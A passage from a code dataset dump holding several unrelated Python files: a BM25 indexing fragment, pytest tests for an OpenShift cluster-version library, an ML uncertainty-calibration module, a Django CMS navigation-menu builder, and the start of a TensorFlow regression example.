self.clean(doc_tit)\n doc_des = self.clean(doc_des)\n if doc_tag:\n doc_tag = self.clean(doc_tag)\n doc_terms=sorted(list(set(doc_tit+doc_des+doc_tag)))\n else:\n doc_terms=sorted(list(set(doc_tit+doc_des)))\n for term in doc_terms:\n if len(term)==0:\n continue\n doc_instance = {}\n doc_instance[\"term\"]=term\n doc_instance[\"docid\"]=doc_id\n doc_instance[\"tf_title\"]=doc_tit.count(term)\n doc_instance[\"tf_description\"]=doc_des.count(term)\n if doc_tag:\n doc_instance[\"tf_tag\"]=doc_tag.count(term)\n else:\n doc_instance[\"tf_tag\"]=0\n doc_json.append(doc_instance)\n return doc_json\n\n\n def sort_terms(self):\n \"\"\"Sort dictionary alphabetely\n \"\"\"\n doc_json = self.get_terms()\n doc_json = sorted(doc_json, key=lambda k: k['term'])\n self.fw.json_writer(doc_json)\n \n def clean(self, lst):\n \"\"\"\n \"\"\"\n remove_punctuation_map = dict((ord(char), None) for char in self.punc)\n lst = [x.translate(remove_punctuation_map) for x in lst]\n lst = [x.lower() for x in lst]\n lst = [x for x in lst if not x.isdigit()]\n return lst\n\n\n","sub_path":"src/bm25-f/inverted_index_init.py","file_name":"inverted_index_init.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"262022353","text":"from unittest import mock\n\nimport pytest\n\nfrom piqe_ocp_lib.api.constants import CLUSTER_VERSION_OPERATOR_ID\nfrom piqe_ocp_lib.api.resources.ocp_cluster_versions import OcpClusterVersion\n\n\n@pytest.fixture(scope=\"session\")\ndef ocp_cv(get_kubeconfig):\n kube_config_file = get_kubeconfig\n return OcpClusterVersion(kube_config_file=kube_config_file)\n\n\nclass TestOcpClusterVersion:\n def test_get_cluster_version(self, ocp_cv):\n \"\"\"\n Verify that cluster version response is returned.\n :param ocp_cv: OcpClusterVersion class object\n :return:\n \"\"\"\n expected_operator_name = \"version\"\n\n result = ocp_cv.get_cluster_version()\n\n assert result.metadata.name == expected_operator_name\n\n def test_get_cluster_id(self, ocp_cv):\n \"\"\"\n Verify that cluster ID is returned\n :param ocp_cv: OcpClusterVersion class object\n :return:\n \"\"\"\n cluster_version = ocp_cv.get_cluster_version()\n expected_cluster_id = cluster_version.spec.clusterID\n\n result = ocp_cv.get_cluster_id()\n\n assert isinstance(result, str)\n assert result == expected_cluster_id\n\n def test_build_spec_with_empty_input(self, ocp_cv):\n input_spec = {}\n cluster_version = ocp_cv.get_cluster_version()\n expected_output = {\n \"apiVersion\": ocp_cv.api_version,\n \"kind\": ocp_cv.kind,\n \"spec\": {\"clusterId\": cluster_version.spec.clusterID},\n \"metadata\": {\n \"name\": CLUSTER_VERSION_OPERATOR_ID,\n \"resourceVersion\": cluster_version.metadata.resourceVersion,\n },\n }\n\n result = ocp_cv._build_spec(input_spec)\n\n assert result == expected_output\n\n def test_build_spec_with_user_input(self, ocp_cv):\n input_spec = {\n \"metadata\": {\"foo\": \"bar\", \"name\": \"fake\"},\n \"spec\": {\"quick\": \"fox\", \"clusterId\": 1},\n }\n cluster_version = ocp_cv.get_cluster_version()\n expected_output = {\n \"apiVersion\": ocp_cv.api_version,\n \"kind\": ocp_cv.kind,\n \"spec\": {\n \"clusterId\": cluster_version.spec.clusterID, # replaced\n \"quick\": \"fox\", # merged\n },\n \"metadata\": {\n \"name\": CLUSTER_VERSION_OPERATOR_ID, # replaced\n \"resourceVersion\": cluster_version.metadata.resourceVersion,\n \"foo\": \"bar\", # merged\n },\n }\n\n result = ocp_cv._build_spec(input_spec)\n\n assert result == expected_output\n\n @pytest.mark.parametrize(\n \"available_updates,expected\",\n [\n (None, []),\n (\n [\n {\n \"channels\": [\"candidate-4.6\", \"eus-4.6\", \"fast-4.6\", \"stable-4.6\"],\n \"image\": \"quay.io\",\n \"url\": \"https://foo.bar\",\n \"version\": \"4.6.8\",\n },\n {\n \"channels\": [\"candidate-4.6\", \"eus-4.6\", \"fast-4.6\", \"stable-4.6\"],\n \"image\": \"quay.io\",\n \"url\": \"https://foo.bar\",\n \"version\": \"4.6.12\",\n },\n ],\n [\"4.6.8\", \"4.6.12\"],\n ),\n (\n [\n {\n \"channels\": [\"candidate-4.6\", \"eus-4.6\", \"fast-4.6\", \"stable-4.6\"],\n \"image\": \"quay.io\",\n \"url\": \"https://foo.bar\",\n \"version\": \"4.6.12\",\n },\n {\n \"channels\": [\"candidate-4.6\", \"eus-4.6\", \"fast-4.6\", \"stable-4.6\"],\n \"image\": \"quay.io\",\n \"url\": \"https://foo.bar\",\n \"version\": \"4.6.8\",\n },\n ],\n [\"4.6.12\", \"4.6.8\"],\n ),\n ],\n ids=[\"no-updates\", \"sorted\", \"reverse-sorted\"],\n )\n def test_available_updates(self, ocp_cv, available_updates, expected):\n with mock.patch.object(ocp_cv, \"get_cluster_version\") as mock_version:\n mock_version.return_value.status.availableUpdates = available_updates\n\n result = ocp_cv.available_updates()\n\n mock_version.assert_called_once()\n\n assert isinstance(result, list)\n assert result == expected\n\n @pytest.mark.parametrize(\n \"available_updates,channel,expected\",\n [\n (\n [\n {\"channels\": [\"stable-4.6\"], \"image\": \"quay.io\", \"url\": \"https://foo.bar\", \"version\": \"4.6.12\"},\n {\"channels\": [\"stable-4.7\"], \"image\": \"quay.io\", \"url\": \"https://foo.bar\", \"version\": \"4.6.8\"},\n {\"channels\": [\"fast-4.7\"], \"image\": \"quay.io\", \"url\": \"https://foo.bar\", \"version\": \"4.6.8\"},\n ],\n \"stable-4.6\",\n [\"4.6.12\"],\n ),\n (\n [\n {\"channels\": [\"fast-4.7\"], \"image\": \"quay.io\", \"url\": \"https://foo.bar\", \"version\": \"4.6.8\"},\n {\"channels\": [\"fast-4.7\"], \"image\": \"quay.io\", \"url\": \"https://foo.bar\", \"version\": \"4.6.12\"},\n ],\n \"fast-4.7\",\n [\"4.6.8\", \"4.6.12\"],\n ),\n ],\n ids=[\"filter-stable\", \"filter-fast\"],\n )\n def test_available_updates_with_filter(self, ocp_cv, available_updates, channel, expected):\n with mock.patch.object(ocp_cv, \"get_cluster_version\") as mock_version:\n mock_version.return_value.status.availableUpdates = available_updates\n\n result = ocp_cv.available_updates(channel=channel)\n\n mock_version.assert_called_once()\n\n assert isinstance(result, list)\n assert result == expected\n\n @pytest.mark.parametrize(\n \"available_channels,expected\",\n [\n (None, set()),\n (\n [\n {\n \"channels\": [\"candidate-4.6\", \"eus-4.6\", \"fast-4.6\", \"stable-4.6\"],\n \"image\": \"quay.io\",\n \"url\": \"https://foo.bar\",\n \"version\": \"4.6.8\",\n },\n {\n \"channels\": [\"candidate-4.6\", \"foo-4.7\", \"fast-4.6\", \"stable-4.6\"],\n \"image\": \"quay.io\",\n \"url\": \"https://foo.bar\",\n \"version\": \"4.6.9\",\n },\n ],\n {\"candidate-4.6\", \"eus-4.6\", \"fast-4.6\", \"stable-4.6\", \"foo-4.7\"},\n ),\n ],\n ids=[\"no-updates\", \"available-updates\"],\n )\n def test_available_channels(self, ocp_cv, available_channels, expected):\n with mock.patch.object(ocp_cv, \"get_cluster_version\") as mock_version:\n mock_version.return_value.status.availableUpdates = available_channels\n\n result = ocp_cv.available_channels()\n\n mock_version.assert_called_once()\n\n assert isinstance(result, set)\n assert result == expected\n\n @pytest.mark.parametrize(\n \"available_updates,channel,expected\",\n [\n (\n [\n {\"channels\": [\"stable-4.6\"], \"image\": \"quay.io\", \"url\": \"https://foo.bar\", \"version\": \"4.6.12\"},\n {\"channels\": [\"stable-4.7\"], \"image\": \"quay.io\", \"url\": \"https://foo.bar\", \"version\": \"4.6.8\"},\n ],\n \"foo\",\n set(),\n ),\n (\n [\n {\"channels\": [\"fast-4.7\"], \"image\": \"quay.io\", \"url\": \"https://foo.bar\", \"version\": \"4.6.8\"},\n {\"channels\": [\"fast-4.6\"], \"image\": \"quay.io\", \"url\": \"https://foo.bar\", \"version\": \"4.6.12\"},\n ],\n \"fast\",\n {\"fast-4.7\", \"fast-4.6\"},\n ),\n ],\n ids=[\"filter-nothing\", \"filter-fast\"],\n )\n def test_available_channels_with_filter(self, ocp_cv, available_updates, channel, expected):\n with mock.patch.object(ocp_cv, \"get_cluster_version\") as mock_version:\n mock_version.return_value.status.availableUpdates = available_updates\n\n result = ocp_cv.available_channels(kind=channel)\n\n mock_version.assert_called_once()\n\n assert isinstance(result, set)\n assert result == expected\n\n @pytest.mark.parametrize(\n \"available_updates,expected\",\n [\n ([], None),\n ([\"4.6.8\", \"4.6.12\"], \"4.6.12\"),\n ([\"4.6.12\", \"4.6.8\"], \"4.6.8\"), # Always last element in the list\n ],\n ids=[\"no-updates\", \"sorted\", \"reverse-sorted\"],\n )\n def test_latest_update_available(self, ocp_cv, available_updates, expected):\n with mock.patch.object(ocp_cv, \"available_updates\") as mock_version:\n mock_version.return_value = available_updates\n\n result = ocp_cv.latest_update_available()\n\n mock_version.assert_called_once()\n\n assert result == expected\n\n def test_update_channel(self, ocp_cv):\n input_channel = \"fast-4.6\"\n\n with mock.patch.object(ocp_cv, \"_build_spec\") as mock_build:\n expected_spec = {\"spec\": {\"channel\": input_channel}}\n mock_build.return_value = {\"wrapped\": expected_spec}\n\n with mock.patch.object(ocp_cv, \"update_cluster_version\") as mock_update:\n mock_update.return_value = \"updated\"\n\n result = ocp_cv.update_channel(input_channel)\n\n mock_build.assert_called_once_with(expected_spec)\n mock_update.assert_called_once_with({\"wrapped\": expected_spec})\n\n assert result == \"updated\"\n\n def test_upgrade_cluster_version_without_timeout(self, ocp_cv):\n version = \"4.6.8\"\n force = False\n\n with mock.patch.object(ocp_cv, \"_build_spec\") as mock_build:\n expected_build_spec = {\n \"spec\": {\n \"desiredUpdate\": {\n \"force\": force,\n \"version\": version,\n }\n }\n }\n mock_build.return_value = mock.sentinel.build_spec\n with mock.patch.object(ocp_cv, \"update_cluster_version\") as mock_update:\n mock_update.return_value = mock.sentinel.update_cluster\n\n result = ocp_cv.upgrade_cluster_version(version, force, timeout=0)\n\n mock_update.assert_called_once_with(mock.sentinel.build_spec)\n mock_build.assert_called_once_with(expected_build_spec)\n\n assert result == mock.sentinel.update_cluster\n","sub_path":"piqe_ocp_lib/tests/resources/test_ocp_cluster_versions.py","file_name":"test_ocp_cluster_versions.py","file_ext":"py","file_size_in_byte":10729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"310288546","text":"import multiprocessing\n\nimport numpy\nimport sklearn\nfrom matplotlib import pyplot as plt\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\nfrom sklearn.metrics import brier_score_loss\n\nfrom pytolemaic.utils.constants import REGRESSION, CLASSIFICATION\nfrom pytolemaic.utils.dmd import DMD\nfrom pytolemaic.utils.general import GeneralUtils\nfrom pytolemaic.utils.metrics import Metrics\n\n\nclass UncertaintyModelBase():\n\n def __init__(self, model, uncertainty_method: str,\n ptype=None,\n supported_methods: list = None):\n self.model = model\n self.uncertainty_method = uncertainty_method\n self.dmd_supported = None\n self.is_classification = GeneralUtils.is_classification(model)\n\n if (self.is_classification and ptype != CLASSIFICATION) or \\\n (not self.is_classification and ptype == CLASSIFICATION):\n raise ValueError(\n \"{} does not support {}\".format(type(self), ptype))\n\n if self.uncertainty_method not in supported_methods:\n raise NotImplementedError(\n \"Uncertainty method {} is not in supported methods={}\".format(\n self.uncertainty_method, supported_methods))\n\n def uncertainty(self, dmd: DMD):\n raise NotImplementedError(\"\")\n\n def fit_uncertainty_model(self, dmd_test, **kwargs):\n raise NotImplementedError(\"\")\n\n def fit(self, dmd_test: DMD, **kwargs):\n self.dmd_supported = GeneralUtils.dmd_supported(model=self.model,\n dmd=dmd_test)\n\n self.fit_uncertainty_model(dmd_test, **kwargs)\n return self\n\n def predict(self, dmd: DMD):\n if self.dmd_supported:\n if not isinstance(dmd, DMD):\n dmd = DMD(x=dmd)\n return self.model.predict(dmd)\n else:\n if isinstance(dmd, DMD):\n x = dmd.values\n else:\n x = dmd\n return self.model.predict(x)\n\n def predict_proba(self, dmd: DMD):\n if self.dmd_supported:\n if not isinstance(dmd, DMD):\n raise ValueError(\"DMD supported but input is not dmd\")\n return self.model.predict_proba(dmd)\n else:\n if isinstance(dmd, DMD):\n x = dmd.values\n else:\n x = dmd\n return self.model.predict_proba(x)\n\n def plot_calibration_curve(self):\n raise NotImplementedError\n\n\nclass UncertaintyModelRegressor(UncertaintyModelBase):\n\n def __init__(self, model, uncertainty_method='rmse'):\n super(UncertaintyModelRegressor, self).__init__(\n model=model, uncertainty_method=uncertainty_method,\n ptype=REGRESSION, supported_methods=['mae', 'rmse'])\n self._n_bins = 10\n self.actual_error = None\n self.mean_predicted_error = None\n self._cal_curve_uncertainty = None\n\n def fit_uncertainty_model(self, dmd_test, n_jobs=multiprocessing.cpu_count() - 1,\n metric=Metrics.r2, **kwargs):\n\n dmd_test, cal_curve_samples = dmd_test.split(ratio=0.1)\n\n if self.uncertainty_method in ['mae']:\n estimator = RandomForestRegressor(\n random_state=0, n_jobs=n_jobs,\n n_estimators=kwargs.pop('n_estimators', 100))\n\n self.uncertainty_model = GeneralUtils.simple_imputation_pipeline(\n estimator)\n\n yp = self.predict(dmd_test)\n self.uncertainty_model.fit(dmd_test.values,\n numpy.abs(\n dmd_test.target.ravel() - yp.ravel()))\n elif self.uncertainty_method in ['rmse']:\n estimator = RandomForestRegressor(\n random_state=0, n_jobs=n_jobs,\n n_estimators=kwargs.pop('n_estimators', 100))\n\n self.uncertainty_model = GeneralUtils.simple_imputation_pipeline(\n estimator)\n\n yp = self.predict(dmd_test)\n self.uncertainty_model.fit(dmd_test.values,\n (dmd_test.target.ravel() - yp.ravel()) ** 2)\n\n else:\n raise NotImplementedError(\"Method {} is not implemented\"\n .format(self.uncertainty_method))\n\n # calibration curve\n y_pred = self.predict(cal_curve_samples).ravel()\n y_true = cal_curve_samples.target.ravel()\n\n delta = numpy.abs(y_true - y_pred)\n uncertainty = self.uncertainty(cal_curve_samples).ravel()\n self._cal_curve_uncertainty = uncertainty\n\n bins = numpy.linspace(0., max(uncertainty) + 1e-8, self._n_bins + 1).ravel()\n binids = numpy.digitize(uncertainty, bins) - 1\n\n bin_sums = numpy.bincount(binids, weights=uncertainty, minlength=len(bins))\n bin_true = numpy.bincount(binids, weights=delta, minlength=len(bins))\n bin_total = numpy.bincount(binids, minlength=len(bins))\n\n nonzero = bin_total != 0\n self.actual_error = (bin_true[nonzero] / bin_total[nonzero])\n self.mean_predicted_error = (bin_sums[nonzero] / bin_total[nonzero])\n\n # calibration curve by metric\n\n performance = []\n uncertainty_levels_middle = []\n for ibin in range(len(bins) - 1):\n inds = binids == ibin\n if numpy.sum(inds) < 5:\n continue\n\n subset_score = metric.function(y_true=y_true[inds], y_pred=y_pred[inds])\n performance.append(subset_score)\n uncertainty_levels_middle.append((bins[ibin] + bins[ibin + 1]) / 2)\n\n self._cal_curve_metric = {'uncertainty': uncertainty_levels_middle,\n 'score': performance,\n 'metric': metric.name}\n\n def uncertainty(self, dmd: DMD):\n if isinstance(dmd, DMD):\n x = dmd.values\n else:\n x = dmd\n\n if self.uncertainty_method in ['mae']:\n out = self.uncertainty_model.predict(x)\n return out.reshape(-1, 1)\n elif self.uncertainty_method in ['rmse']:\n out = numpy.sqrt(self.uncertainty_model.predict(x))\n return out.reshape(-1, 1)\n else:\n raise NotImplementedError(\"Method {} is not implemented\"\n .format(self.uncertainty_method))\n\n def plot_calibration_curve(self):\n fig = plt.figure(figsize=(10, 10))\n ax1 = plt.subplot2grid((3, 1), (0, 0), rowspan=2)\n ax2 = plt.subplot2grid((3, 1), (2, 0))\n\n ax1.plot([min(self.mean_predicted_error), max(self.mean_predicted_error)],\n [min(self.mean_predicted_error), max(self.mean_predicted_error)], \"k:\", label=\"Perfectly calibrated\")\n\n ax1.plot(self.mean_predicted_error, self.actual_error, \"s-\",\n color='b')\n\n # todo: remove _cal_curve_uncertainty from self\n ax2.hist(self._cal_curve_uncertainty, range=(0, 1.),\n bins=self._n_bins,\n color='b',\n histtype=\"step\", lw=2)\n\n ax1.set_ylabel(\"Actual error\")\n ax1.set_ylim([min(self.actual_error) * 0.95, max(self.actual_error) * 1.05])\n ax1.legend(loc=\"lower right\")\n ax1.set_title(\"Calibartion Curve for method {} (Regression)\".format(self.uncertainty_method))\n\n ax2.set_xlabel(\"Mean predicted error\")\n ax2.set_ylabel(\"Count\")\n ax2.legend(loc=\"upper center\", ncol=2)\n\n # curve by metric\n plt.figure()\n plt.plot(self._cal_curve_metric['uncertainty'], self._cal_curve_metric['score'], '*-r')\n\n plt.xlabel(\"Uncertainty level ({})\".format(self.uncertainty_method))\n plt.ylabel(\"{} score\".format(self._cal_curve_metric['metric']))\n plt.title(\"{} score vs uncertainty level\".format(self._cal_curve_metric['metric']))\n\n\nclass UncertaintyModelClassifier(UncertaintyModelBase):\n\n def __init__(self, model, uncertainty_method='confidence'):\n super(UncertaintyModelClassifier, self).__init__(model=model,\n uncertainty_method=uncertainty_method,\n ptype=CLASSIFICATION,\n supported_methods=[\n 'probability',\n 'confidence']\n )\n\n self._brier_loss = -1\n self._fraction_of_positives = None\n self._mean_uncertainty = None\n self._cal_curve_uncertainty = None\n self._n_bins = 10\n\n def fit_uncertainty_model(self, dmd_test, n_jobs=multiprocessing.cpu_count() - 1,\n metric=Metrics.recall,\n **kwargs):\n\n if self.uncertainty_method in ['probability']:\n cal_curve_samples = dmd_test\n # no fit logic required\n\n elif self.uncertainty_method in ['confidence']:\n dmd_test, cal_curve_samples = dmd_test.split(ratio=0.1)\n\n estimator = RandomForestClassifier(\n random_state=0, n_jobs=n_jobs, n_estimators=100)\n\n self.uncertainty_model = GeneralUtils.simple_imputation_pipeline(\n estimator)\n\n y_pred = self.predict(dmd_test)\n is_correct = numpy.array(y_pred.ravel() == dmd_test.target.ravel(),\n dtype=int)\n\n # bug here\n self.uncertainty_model.fit(dmd_test.values, is_correct.ravel())\n\n else:\n raise NotImplementedError(\"Method {} is not implemented\"\n .format(self.uncertainty_method))\n\n # calibration curve\n\n y_pred = self.predict(cal_curve_samples).ravel()\n y_true = cal_curve_samples.target.ravel()\n uncertainty = self.uncertainty(cal_curve_samples)\n self._cal_curve_uncertainty = uncertainty\n\n self._fraction_of_positives, self._mean_uncertainty = sklearn.calibration.calibration_curve(\n y_true=y_pred == y_true,\n y_prob=uncertainty,\n normalize=True,\n n_bins=self._n_bins,\n strategy='uniform')\n\n sample_weight = None\n self._brier_loss = brier_score_loss(\n y_true=y_pred == y_true,\n y_prob=1 - uncertainty,\n sample_weight=sample_weight,\n pos_label=1)\n\n # calibration curve by metric\n\n uncertainty = uncertainty / max(uncertainty)\n\n bins = numpy.linspace(0., max(uncertainty) + 1e-8, 5 + 1)\n binids = numpy.digitize(uncertainty.flatten(), bins.ravel()) - 1\n\n performance = []\n uncertainty_levels_middle = []\n for ibin in range(len(bins) - 1):\n inds = binids == ibin\n if numpy.sum(inds) < 5:\n continue\n\n subset_score = metric.function(y_true=y_true[inds], y_pred=y_pred[inds])\n performance.append(subset_score)\n uncertainty_levels_middle.append((bins[ibin] + bins[ibin + 1]) / 2)\n\n self._cal_curve_metric = {'uncertainty': uncertainty_levels_middle,\n 'score': performance,\n 'metric': metric.name}\n\n def uncertainty(self, dmd: DMD):\n\n if self.uncertainty_method in ['probability']:\n yproba = self.predict_proba(dmd)\n yproba += 1e-10 * numpy.random.RandomState(0).rand(*yproba.shape)\n max_probability = numpy.max(yproba, axis=1).reshape(-1, 1)\n delta = max_probability - yproba\n yproba[delta == 0] = 0\n\n # delta[numpy.sum(delta, axis=1)>=20,:] = 0 # i\n out = numpy.max(yproba, axis=1).reshape(-1, 1) / max_probability\n return GeneralUtils.f5(out).reshape(-1, 1)\n elif self.uncertainty_method in ['confidence']:\n if isinstance(dmd, DMD):\n x = dmd.values\n else:\n x = dmd\n # return the probability it's a mistake\n out = self.uncertainty_model.predict_proba(x)[:, 0]\n return GeneralUtils.f5(out).reshape(-1, 1)\n else:\n raise NotImplementedError(\"Method {} is not implemented\"\n .format(self.uncertainty_method))\n\n def plot_calibration_curve(self):\n fig = plt.figure(figsize=(10, 10))\n ax1 = plt.subplot2grid((3, 1), (0, 0), rowspan=2)\n ax2 = plt.subplot2grid((3, 1), (2, 0))\n\n ax1.plot([0, 1], [1, 0.5], \"k:\", label=\"Perfectly calibrated\")\n\n ax1.plot(self._mean_uncertainty, self._fraction_of_positives, \"s-\",\n color='b',\n label=\"brier loss=%1.3f\" % self._brier_loss)\n\n # todo: remove y_proba from self\n ax2.hist(self._cal_curve_uncertainty, range=(0, 1.),\n bins=self._n_bins,\n color='b',\n histtype=\"step\", lw=2)\n\n ax1.set_ylabel(\"Fraction of correct predictions\")\n ax1.set_ylim([-0.05, 1.05])\n ax1.legend(loc=\"lower right\")\n ax1.set_title(\"Calibartion Curve for method {}\".format(self.uncertainty_method))\n\n ax2.set_xlabel(\"Mean uncertainty\")\n ax2.set_ylabel(\"Count\")\n ax2.legend(loc=\"upper center\", ncol=2)\n\n # curve by metric\n plt.figure()\n plt.plot(self._cal_curve_metric['uncertainty'], self._cal_curve_metric['score'], '*-r')\n\n plt.xlabel(\"Uncertainty level ({})\".format(self.uncertainty_method))\n plt.ylabel(\"{} score\".format(self._cal_curve_metric['metric']))\n plt.title(\"{} score vs uncertainty level\".format(self._cal_curve_metric['metric']))\n","sub_path":"pytolemaic/prediction_uncertainty/uncertainty_model.py","file_name":"uncertainty_model.py","file_ext":"py","file_size_in_byte":13803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"271592623","text":"#-*-coding: utf-8 -*-\n\"\"\"\n/dms/utils_navigation.py\n\n.. enthaelt Hilfsroutinen zurm Aendern des linken Navigationsbereichs\n Django content Management System\n\nHans Rauch\nhans.rauch@gmx.net\n\nDie Programme des dms-Systems koennen frei genutzt und den spezifischen\nBeduerfnissen entsprechend angepasst werden.\n\n0.01 12.03.2007 Beginn der Arbeit\n0.02 11.10.2007 item.is_main_menu\n\"\"\"\n\nimport string\n\nfrom django.utils.safestring import SafeData, mark_safe, SafeUnicode\nfrom django.utils.translation import ugettext as _\n\nfrom dms.queries import delete_menuitem_navmenu_left\nfrom dms.queries import get_menuitems_by_menu_id_left\nfrom dms.queries import get_new_navmenu_left\nfrom dms.queries import delete_menuitem_navmenu_top\nfrom dms.queries import get_new_navmenu_top\n\nfrom dms.encode_decode import decode_html\n\n# -----------------------------------------------------\ndef get_navmenu_choices_left(menu_id):\n \"\"\" Auswahl des Navigationsmenus \"\"\"\n ret = []\n ret.append( ('|', mark_safe(_('(Lokale) Startseite'))) )\n menu = get_menuitems_by_menu_id_left(menu_id)[0]\n lines = string.splitfields(menu.navigation, '\\n')\n nav_main = ''\n nav_sub = ''\n for line in lines:\n line = string.strip(line)\n if line != '' and line[0] != '#':\n arr = string.splitfields(line, '|')\n if len(arr) > 1:\n my_depth = int(string.strip(arr[0]))\n my_alias = string.strip(arr[1])\n if my_depth == 0:\n nav_main = my_alias\n nav_sub = ''\n else:\n nav_sub = my_alias\n info = string.strip(arr[3])\n if my_depth == 0:\n info = '' + info + ''\n ret.append( (nav_main + '|' + nav_sub, mark_safe(info)) )\n return ret\n\n# -----------------------------------------------------\ndef get_data_left(line):\n \"\"\" Beschreibung der linken Navigation \"\"\"\n line = string.strip(line)\n if line == '' or line[0] == '#':\n return -1, -1, ''\n arr = string.splitfields(line, '|')\n if len(arr) == 1:\n return -999, -1, '
\\n'\n else:\n ret = ''\n my_depth = int(string.strip(arr[0]))\n my_alias = string.strip(arr[1])\n link = string.strip(arr[2])\n info = string.strip(arr[3])\n if len(arr) > 4:\n title = string.replace(string.strip(arr[4]), '\"', '"')\n else:\n title = ''\n if len(arr) > 5 :\n ret += string.replace(arr[5], '"', '\"') + ' '\n ret += u'' % (link, title)\n ret += '' + info + '|'\n else:\n ret += u'' % (link, title)\n ret += info + '|'\n return my_depth, my_alias, ret\n\n# -----------------------------------------------------\ndef get_top_navigation_menu_left(lines):\n \"\"\" Beschreibung der oberen Navigation \"\"\"\n ret = ''\n for line in lines:\n my_depth, my_alias, res = get_data_left(line)\n if my_depth == 0:\n if res != '' and string.find(res, ' 1:\n ret = ''\n my_alias = string.strip(arr[0])\n link = string.strip(arr[1])\n info = string.strip(arr[2])\n if len(arr) > 3:\n title = string.replace(string.strip(arr[3]), '\"', '"')\n else:\n title = ''\n if len(arr) > 4 :\n prefix = string.replace(arr[4], '"', '\"') + ' '\n else:\n prefix = ''\n if len(arr) > 5:\n target = ' target=\"_extern\"'\n else:\n target = ''\n if nav_main != '' and nav_main == my_alias:\n link = u'' + \\\n '  %s  ' % info\n ret += prefix + link\n else:\n c = 'navTopLink'\n start_of_link = ''\n end_of_link = ''\n ret += u'' % (c, link, title, target)\n ret += prefix + start_of_link + info + end_of_link + ''\n #assert False\n return my_alias, ret\n\n# -----------------------------------------------------\ndef get_top_navigation_menu_top(lines, profi_mode):\n \"\"\" liefert das oberste Menu \"\"\"\n ret = ''\n for line in lines:\n my_alias, res = get_data_top(line, 'start', profi_mode)\n if my_alias > -1:\n if ret != '':\n ret += ' | '\n ret += res\n return ret\n\n# -----------------------------------------------------\ndef get_top_navigation_menu(lines, nav_main, profi_mode):\n \"\"\" liefert das obere Hauptmenu \"\"\"\n ret = ''\n for line in lines:\n my_alias, res = get_data_top(line, nav_main, profi_mode)\n if my_alias > -1:\n if ret != '':\n ret += ' | '\n ret += res\n return ret\n\n# -----------------------------------------------------\ndef get_navigation_menu(lines, *args):\n \"\"\" liefert das linke Menu \"\"\"\n n_args = 0\n menu = []\n for n in xrange(4):\n try:\n menu.append(args[n])\n n_args += 1\n except:\n menu.append('')\n ret = u''\n select = 0\n for line in lines:\n my_depth, my_alias, res = get_data_left(line)\n if res != '' and string.find(res, '\\n'\n elif my_depth == 0 or select == 2:\n ret += res_start + res + res_end\n if select == 1:\n ret += '
\\n'\n select = 2\n if select == 2:\n ret += '
\\n\\n\\n'\n return ret\n\n# -----------------------------------------------------\ndef get_menu_data(id=1):\n \"\"\" liefert die Menudaten \"\"\"\n menu = get_menuitems_by_id_navmenu_left(id)[0]\n return menu.navigation\n\n# -----------------------------------------------------\ndef save_menus_left(menu_id, text, is_main_menu=False):\n \"\"\" speichert die Menues in der Datenbank \"\"\"\n\n def save_this_menu (menu_id, name, navigation, is_main_menu):\n item = get_new_navmenu_left()\n item.menu_id = menu_id\n item.name = name\n item.navigation = navigation\n item.is_main_menu = is_main_menu\n item.save()\n\n lines = string.splitfields(text, '\\n')\n\n delete_menuitem_navmenu_left(menu_id)\n menu = get_top_navigation_menu_left(lines)\n save_this_menu(menu_id, '|', menu, is_main_menu)\n\n nav_main = ''\n nav_sub = ''\n nav_sub_sub = ''\n for line in lines:\n line = string.strip(line)\n if line != '' and line[0] != '#':\n arr = string.splitfields(line, '|')\n if len(arr) > 1:\n my_depth = int(string.strip(arr[0]))\n my_alias = string.strip(arr[1])\n if my_depth == 0:\n nav_main = my_alias\n nav_sub = ''\n nav_sub_sub = ''\n elif my_depth == 1:\n nav_sub = my_alias\n nav_sub_sub = ''\n else:\n nav_sub_sub = my_alias\n info = string.strip(arr[3])\n if nav_sub == '':\n menu = get_navigation_menu(lines, nav_main)\n elif nav_sub_sub == '':\n menu = get_navigation_menu(lines, nav_main, nav_sub)\n else:\n menu = get_navigation_menu(lines, nav_main, nav_sub, nav_sub_sub)\n save_this_menu(menu_id, nav_main + '|' + nav_sub, menu, is_main_menu)\n\n# -----------------------------------------------------\ndef save_menus_top(menu_id, text, profi_mode=False):\n \"\"\" speichert das obere Hauptmenu \"\"\"\n\n def save_this_menu (menu_id, name, navigation):\n item = get_new_navmenu_top()\n item.menu_id = menu_id\n item.name = name\n item.navigation = navigation\n item.save()\n\n #if not profi_mode:\n # text = decode_html(text)\n lines = string.splitfields(text, '\\n')\n\n delete_menuitem_navmenu_top(menu_id)\n menu = get_top_navigation_menu_top(lines, profi_mode)\n save_this_menu(menu_id, '|', menu)\n\n nav_main = ''\n for line in lines:\n line = string.strip(line)\n if line != '' and line[0] != '#':\n arr = string.splitfields(line, '|')\n if len(arr) > 1:\n my_alias = string.strip(arr[0])\n nav_main = my_alias\n info = string.strip(arr[3])\n menu = get_top_navigation_menu(lines, nav_main, profi_mode)\n save_this_menu(menu_id, nav_main, menu)\n\n# -----------------------------------------------------\ndef save_menu_left_new(menu_id, name, description, navigation, is_main_menu=False):\n \"\"\" legt neues Menue in der Datenbank an \"\"\"\n item = get_new_navmenu_left()\n item.menu_id = menu_id\n item.name = name\n item.description = description\n item.navigation = navigation\n item.is_main_menu = is_main_menu\n item.save()\n","sub_path":"utils_navigation.py","file_name":"utils_navigation.py","file_ext":"py","file_size_in_byte":9601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"510826188","text":"# import necesary packages\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\n# create random points\nnum_points = 1000\npoints = []\nfor i in range(num_points):\n x1= np.random.normal(0.0, 0.55)\n y1= x1 * 0.1 + 0.3 + np.random.normal(0.0, 0.03)\n points.append([x1, y1])\nx_data = [v[0] for v in points]\ny_data = [v[1] for v in points]\n\n\n# display points\nplt.plot(x_data, y_data, 'ro')\nplt.legend()\nplt.show()\n\n# start usigin tensorflow\nW = tf.Variable(tf.random_uniform([1], -1.0, 1.0))\nb = tf.Variable(tf.zeros([1]))\ny = W * x_data + b\n\n# set cost function, optimizer and train\nloss = tf.reduce_mean(tf.square(y - y_data))\noptimizer = tf.train.GradientDescentOptimizer(0.5)\ntrain = optimizer.minimize(loss)\n\n#initialize 